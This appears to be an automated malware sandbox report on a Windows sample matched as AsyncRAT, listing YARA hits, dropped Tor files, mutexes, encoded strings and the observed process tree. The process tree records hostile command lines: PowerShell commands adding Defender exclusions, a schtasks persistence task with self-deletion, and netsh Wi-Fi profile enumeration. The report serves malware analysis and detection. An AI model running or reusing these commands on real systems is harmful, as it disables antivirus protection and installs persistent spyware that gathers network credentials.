Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09B912	25_2_6C09B912
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E5960	25_2_6C0E5960
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A9984	25_2_6C0A9984
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0ED9C0	25_2_6C0ED9C0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DFAA2	25_2_6C0DFAA2
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09B037	25_2_6C09B037
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A9280	25_2_6C0A9280
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1FACF0	25_2_6C1FACF0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C344D30	25_2_6C344D30
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1DCD9D	25_2_6C1DCD9D
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1ACD80	25_2_6C1ACD80
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C192DA0	25_2_6C192DA0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C184E02	25_2_6C184E02
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C184E4B	25_2_6C184E4B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1DEE40	25_2_6C1DEE40
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C184E81	25_2_6C184E81
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C184ECC	25_2_6C184ECC
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1CEEE0	25_2_6C1CEEE0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C184F37	25_2_6C184F37
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1CEF70	25_2_6C1CEF70
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1FCF70	25_2_6C1FCF70
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1ECF90	25_2_6C1ECF90
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C2AAF80	25_2_6C2AAF80
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1CEFAB	25_2_6C1CEFAB
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1F0FE0	25_2_6C1F0FE0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1F8830	25_2_6C1F8830
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1E0855	25_2_6C1E0855
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1CC8B0	25_2_6C1CC8B0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1868E7	25_2_6C1868E7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1C8900	25_2_6C1C8900
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1CC94C	25_2_6C1CC94C
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1849FB	25_2_6C1849FB
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1DCA10	25_2_6C1DCA10
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C184A26	25_2_6C184A26
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1E2A50	25_2_6C1E2A50
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1FAA80	25_2_6C1FAA80
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C184AA0	25_2_6C184AA0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1FAAEC	25_2_6C1FAAEC
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1C8B1B	25_2_6C1C8B1B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C18EB00	25_2_6C18EB00
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C2A2B10	25_2_6C2A2B10
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C188B90	25_2_6C188B90
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1DABB0	25_2_6C1DABB0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C182BA0	25_2_6C182BA0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1FABC0	25_2_6C1FABC0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C188BC7	25_2_6C188BC7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C184439	25_2_6C184439
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C18E4B0	25_2_6C18E4B0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C1D0550	25_2_6C1D0550
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C184568	25_2_6C184568
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C18656C	25_2_6C18656C

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libcrypto-1_1.dll 3F08728C7A67E4998FBDC7A7CB556D8158EFDCDAF0ACF75B7789DCCACE55662D
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\77rh3rhsc7\tor\libevent-2-1-7.dll 91C812A33871E40B264761F1418E37EBFEB750FE61CA00CBCBE9F3769A8BF585

PE / OLE file has an invalid certificate

Source: yt7dW9nyJK.exe

Static PE information: invalid certificate

Sample file is different than original file name gathered from version info

Source: yt7dW9nyJK.exe, 00000000.00000002.2069217913.000000000376E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs yt7dW9nyJK.exe
Source: yt7dW9nyJK.exe, 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesecure.exe4 vs yt7dW9nyJK.exe
Source: yt7dW9nyJK.exe, 00000000.00000000.2037582727.0000000000190000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamexsUpf.exe2 vs yt7dW9nyJK.exe
Source: yt7dW9nyJK.exe, 00000000.00000002.2067271416.000000000060E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs yt7dW9nyJK.exe
Source: yt7dW9nyJK.exe, 00000000.00000002.2070615218.0000000004F70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs yt7dW9nyJK.exe
Source: yt7dW9nyJK.exe, 00000000.00000002.2070321293.0000000004C90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCAA.dll4 vs yt7dW9nyJK.exe
Source: yt7dW9nyJK.exe, 00000004.00000002.4502635576.0000000000416000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesecure.exe4 vs yt7dW9nyJK.exe

Source: yt7dW9nyJK.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 4.2.yt7dW9nyJK.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2068698381.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000002.4502635576.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: yt7dW9nyJK.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ffmaba.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ffmaba.exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, TObVbKys0GgFW4VOqJ2ZBssSxFQuDu4.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, I04X8xDLq2CNC4Xt.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, I04X8xDLq2CNC4Xt.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, TObVbKys0GgFW4VOqJ2ZBssSxFQuDu4.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, I04X8xDLq2CNC4Xt.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, I04X8xDLq2CNC4Xt.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, I04X8xDLq2CNC4Xt.cs	Base64 encoded string: 'MOSjuEXWGCeuUSbv59lDTULs6LFzvYBZH41XkH9yEnDH7YwG5FS0lU64qKjFIPxSZpHgdykYYHkwwAPCb9a5', 'z927ITnSLvRzj6sT0oOQMfxrxePFr4FY7CtHEfOCy3RNRV9CrFoM012BQrHryb3GaEBoxMvKfSq55HIioVkW', 'wkAWgkm9Hq2LUhSApfaGA28Wew5QwxbHuJWGf6GqJHYPfZVOezyZbbLKPk6wOm1dBzMzGxUgIqOhoYfFklgz', 'QCnV4dACN1BDItDwaUKx14Lp3DW9zGfceYG8TrMw92CYFgR9mSa5y4aJCRbCkT4RWuTPN9eptSbPkdWF4emv', 'MllONkDpSW15sVE95prffePmO6NzN5kLSBPsHqqXjtJa0cqfAZPPVSgTl6hiIS6jrBigR4aGyDWPAIVGnr3a', 'yuyROimEtBGgmCQLmPtckzOCDnB9dYPpwiT2g6yI2X6LzGEvML1LQE1j6DMuKhcGFTnnBxQSrJkQfv1YL8Wq', 'kNuuvkCHSOJumFXu0kJYwCQsNlifJrPhlp5sVGzV4GfncK7B4kSPQ8aFEyXg7WBxQEXrlasbdDQ6PUcOFIvq', 'i3ahtLaj6i8OccGnyo30tks0QcCQVfj0XTjILBXzogkUW46MUl8BLmYoEYDoNp7oExTWWK5DEmsVsd9hPteI', 'qGJs5j7hUjde1Dbk7Ahg9thP3jkBeHBp25FT1k0irlmFNPYP04ljLjVxUksZSizkITDnct1IVqHtQYS64iPB', 'kyGILSjU2WVbQG2s46RJTpZOOXbYZoHnzpbY5gRsq1FNEmtlyfU6KaEnt7FXE5WS17Kf4v4XRCi0PJfcZsLl', 'lu2uXyYJbcwZGZyhkXgB2Si3cRdthfqYlNM6gKCqvvVF4GgOto46VKPTwkBwyKlw8R7jntyNEImcMKrrQ3gJ', 'jObCmCT5ZWuaGkeSVM47Z1ErEm2oe5O8QZ9UVIhdWoJWyaSJciGLGwMxlwD8wNwyQsKyizcmNjpHJZZGgWDs', 'SpE7me7kN6nXKVa0rJQsWYcK0UnI8MxzDRWUfMV1TjSEHWT6hi5UDvTs71HVgtmnIJdol37UDfgEGa6dGYwV'
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, I04X8xDLq2CNC4Xt.cs	Base64 encoded string: 'MOSjuEXWGCeuUSbv59lDTULs6LFzvYBZH41XkH9yEnDH7YwG5FS0lU64qKjFIPxSZpHgdykYYHkwwAPCb9a5', 'z927ITnSLvRzj6sT0oOQMfxrxePFr4FY7CtHEfOCy3RNRV9CrFoM012BQrHryb3GaEBoxMvKfSq55HIioVkW', 'wkAWgkm9Hq2LUhSApfaGA28Wew5QwxbHuJWGf6GqJHYPfZVOezyZbbLKPk6wOm1dBzMzGxUgIqOhoYfFklgz', 'QCnV4dACN1BDItDwaUKx14Lp3DW9zGfceYG8TrMw92CYFgR9mSa5y4aJCRbCkT4RWuTPN9eptSbPkdWF4emv', 'MllONkDpSW15sVE95prffePmO6NzN5kLSBPsHqqXjtJa0cqfAZPPVSgTl6hiIS6jrBigR4aGyDWPAIVGnr3a', 'yuyROimEtBGgmCQLmPtckzOCDnB9dYPpwiT2g6yI2X6LzGEvML1LQE1j6DMuKhcGFTnnBxQSrJkQfv1YL8Wq', 'kNuuvkCHSOJumFXu0kJYwCQsNlifJrPhlp5sVGzV4GfncK7B4kSPQ8aFEyXg7WBxQEXrlasbdDQ6PUcOFIvq', 'i3ahtLaj6i8OccGnyo30tks0QcCQVfj0XTjILBXzogkUW46MUl8BLmYoEYDoNp7oExTWWK5DEmsVsd9hPteI', 'qGJs5j7hUjde1Dbk7Ahg9thP3jkBeHBp25FT1k0irlmFNPYP04ljLjVxUksZSizkITDnct1IVqHtQYS64iPB', 'kyGILSjU2WVbQG2s46RJTpZOOXbYZoHnzpbY5gRsq1FNEmtlyfU6KaEnt7FXE5WS17Kf4v4XRCi0PJfcZsLl', 'lu2uXyYJbcwZGZyhkXgB2Si3cRdthfqYlNM6gKCqvvVF4GgOto46VKPTwkBwyKlw8R7jntyNEImcMKrrQ3gJ', 'jObCmCT5ZWuaGkeSVM47Z1ErEm2oe5O8QZ9UVIhdWoJWyaSJciGLGwMxlwD8wNwyQsKyizcmNjpHJZZGgWDs', 'SpE7me7kN6nXKVa0rJQsWYcK0UnI8MxzDRWUfMV1TjSEHWT6hi5UDvTs71HVgtmnIJdol37UDfgEGa6dGYwV'

Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, FNmlZ2aTo37rTj5achFuQvwVWWjwciW.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, FNmlZ2aTo37rTj5achFuQvwVWWjwciW.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, l34GXL5vNW82bgMJ5l.cs	Security API names: _0020.SetAccessControl
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, l34GXL5vNW82bgMJ5l.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, l34GXL5vNW82bgMJ5l.cs	Security API names: _0020.AddAccessRule
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, uU2UPPwPJLQsRsHPyp.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, uU2UPPwPJLQsRsHPyp.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, uU2UPPwPJLQsRsHPyp.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.ffmaba.exe.2590000.0.raw.unpack, rw.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.ffmaba.exe.2590000.0.raw.unpack, rw.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, FNmlZ2aTo37rTj5achFuQvwVWWjwciW.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, FNmlZ2aTo37rTj5achFuQvwVWWjwciW.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, l34GXL5vNW82bgMJ5l.cs	Security API names: _0020.SetAccessControl
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, l34GXL5vNW82bgMJ5l.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, l34GXL5vNW82bgMJ5l.cs	Security API names: _0020.AddAccessRule
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, l34GXL5vNW82bgMJ5l.cs	Security API names: _0020.SetAccessControl
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, l34GXL5vNW82bgMJ5l.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, l34GXL5vNW82bgMJ5l.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@67/78@7/14

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yt7dW9nyJK.exe.log

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Mutant created: \Sessions\1\BaseNamedObjects\SXVvkYHBJwlTYefsyEntPmgFop
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2380:120:WilError_03
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Mutant created: \Sessions\1\BaseNamedObjects\dkm6mrq0hw
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:572:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Mutant created: \Sessions\1\BaseNamedObjects\kAU1GvVR3izXMfie
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lzwpiuff.jmv.ps1

Source: yt7dW9nyJK.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: yt7dW9nyJK.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: yt7dW9nyJK.exe

ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\yt7dW9nyJK.exe "C:\Users\user\Desktop\yt7dW9nyJK.exe"
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Users\user\Desktop\yt7dW9nyJK.exe "C:\Users\user\Desktop\yt7dW9nyJK.exe"
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yt7dW9nyJK.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Users\user\AppData\Local\Temp\ffmaba.exe "C:\Users\user\AppData\Local\Temp\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe "C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe" -f "C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt"
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "SSID BSSID Signal"
Source: unknown	Process created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
